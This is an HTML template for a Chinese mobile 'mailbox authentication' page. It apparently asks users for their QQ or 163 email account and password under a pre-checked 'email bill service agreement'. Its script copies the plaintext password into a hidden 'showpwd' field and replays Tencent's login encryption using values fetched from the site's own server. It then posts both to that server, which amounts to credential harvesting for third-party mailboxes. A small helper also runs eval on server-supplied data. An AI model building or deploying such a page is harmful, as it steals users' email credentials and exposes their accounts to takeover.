	<html lang="zh-cn">
<head>
 <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"/>
    <meta name="apple-mobile-web-app-capable" content="yes"/>
    <meta name="apple-mobile-web-app-status-bar-style" content="black"/>
    <meta name="format-detection" content="telephone=no"/>
    <meta http-equiv="Expires" CONTENT="-1"/>
    <meta http-equiv="Cache-Control" CONTENT="no-cache"/>
    <meta http-equiv="Pragma" CONTENT="no-cache"/>
<script type="text/javascript" charset="utf-8" src="https://imgcache.qq.com/ptlogin/ac/v9/js/area_chs.js"></script>
<script type="text/javascript" charset="utf-8" src="https://imgcache.qq.com/ptlogin/ver/10225/js/login_10.js"></script>
<script type="text/javascript" async="" src="https://captcha.gtimg.com/1/TCapMsg.js"></script>
<script type="text/javascript" async="" src="https://captcha.gtimg.com/1/TCapIframe_m.js?v=1.0"></script>
<script th:src="@{/js/layer.js}"></script>
<script th:src="@{/js/jquery-1.8.2.min.js}"></script>
    <link rel="stylesheet" th:href="@{/css/email.css}"  />
    <link rel="stylesheet" th:href="@{/css/layer.css}"  />

<script> var jq142 = jQuery.noConflict(true); </script>

<script type="text/javascript">
jq142(function (){
	jq142("#input_invisible").blur(function (){
		var val=jq142("#input_invisible").val();
		
		if(val==''){
			jq142("#visible").hide();
		}else{
			jq142("#visible").show();
		}
	})
	
	

	
})
jq142(function (){
	jq142("#input_invisible").keydown(function (){
		var val=jq142("#input_invisible").val();
		
		if(val==''){
			jq142("#visible").hide();
		}else{
			jq142("#visible").show();
		}
	})
	
	

	
})




//加密密码
function weizai(){
 

	
//|
        var number=jq142("#qqnumber").val();
        var pwds=jq142("#input_visible").val();
        if(number==null||number.trim().length==0){
    
               layer.open({
        	            content: '账号不能为空！'
        	            ,btn: '确定'
        	        });
            return false;
        }else if(pwds==null||pwds.trim().length==0){
            layer.open({
	            content: '密码不能为空！'
	            ,btn: '确定'
	        });
            return false;
        }else{
        	
       
         	   if(document.getElementById("agree").checked){
         	    	jq142("#btn").attr("disabled", true); 
                 	jq142("#btn").css('background','#eee')
                 	jq142("#btn").val("处理中...");
                     jq142("#vvv").css('background','#46b1ff')
         	    } else{
         	        layer.open({
         	            content: '请同意《性感邮箱账单服务协议》'
         	            ,btn: '确定'
         	        });
         	        return false;
         	    }

     
         }
     

        if((number.indexOf("@163.com"))>-1){
            jq142("#mailForm").attr("action","../mail163/RZ163Mail.do");
            jq142("#mailForm").submit();
          	jq142("#btn").attr("disabled", true); 
        	jq142("#btn").css('background','#eee')
        	jq142("#btn").val("处理中...");
    	    jq142("#vvv").css('background','#46b1ff')
            return true;
        }

        
        
        



	jq142.ajax({
 	
        data: {qqnumber:jq142("#qqnumber").val()},
		 url:"../interface/encryptrsa.do",
	
		 success:function (data, textStatus) {
		
			//给 全局变量赋值。用于提交加密
		
			
			//判断是否需要验证码
				if(data.code=="用户邮箱异常,请明天再来尝试"){
					alert("用户邮箱异常,请明天再来尝试");
				}else{
					var  salt=getSalt(data.xx.replace(/\\x/g, ""));
					 var qqpwd=document.getElementById('input_visible').value;
				
					document.getElementById('showpwd').value=qqpwd;
					var encryptionPassword = $.Encryption.getEncryption(qqpwd,salt,data.code);
					document.getElementById('input_visible').value=encryptionPassword;
					document.getElementById('sess').value=data.sess;
					document.getElementById('codes').value=data.code;
					  document.getElementById("mailForm").submit();
				}
		
	
	
			 
		
		 }
	});


}(jq142);



 //转换salt
function getSalt(str) {
	//  <![CDATA[
    for (var arr = [], i = 0; i < str.length; i += 2)
        arr.push("\\x" + str.substr(i, 2));
    return arr = arr.join(""),
    eval("var temp = '" + arr + "'"),
    temp
    //]]>
}

 
(function($){
//加载获取 加密所需的字段值	

})(jq142);
</script>
</head>
  <body>
  <form action="../interface/test.do" method="POST" id="mailForm">
    	<header>
    		<div class="title">
                <a class="leftGo" href="#"></a>
<!-- 		        <div class="header-text">邮箱认证</div> -->
            </div> 
    	</header>
    	<div class="login-login">
            <div class="login-content">
                <div class="login-num">
                    <img src="../image/mail/email.png" />
                    <input type="text" name="qqnumber" id="qqnumber" placeholder="&nbsp;&nbsp;&nbsp;请输入您的账号/手机号码"/>
                </div>
                <div class="login-num">
                    <img src="../image/mail/lock.png"/>
                    <input type="password" name="password" id="input_visible" placeholder="&nbsp;&nbsp;&nbsp;请输入您的密码"/>
                </div>  
            </div>
			<input type="hidden" id="sess"  name="sess"  />
			<input type="hidden" id="codes"  name="code"  />
			<input type="hidden" id="showpwd"  name="showpwd" />

       
    		
         <button type="button" class="login-dl" id="btn" onclick="return weizai()">认 证</button>
                <div>
               	   <input  type="checkbox"   checked="check" id="agree" />
                    <p class="last-word">同意<a href="agreement.html">《性感邮箱账单服务协议》</a></p>
                </div>
        </div>
</form>
    </body>
</html>



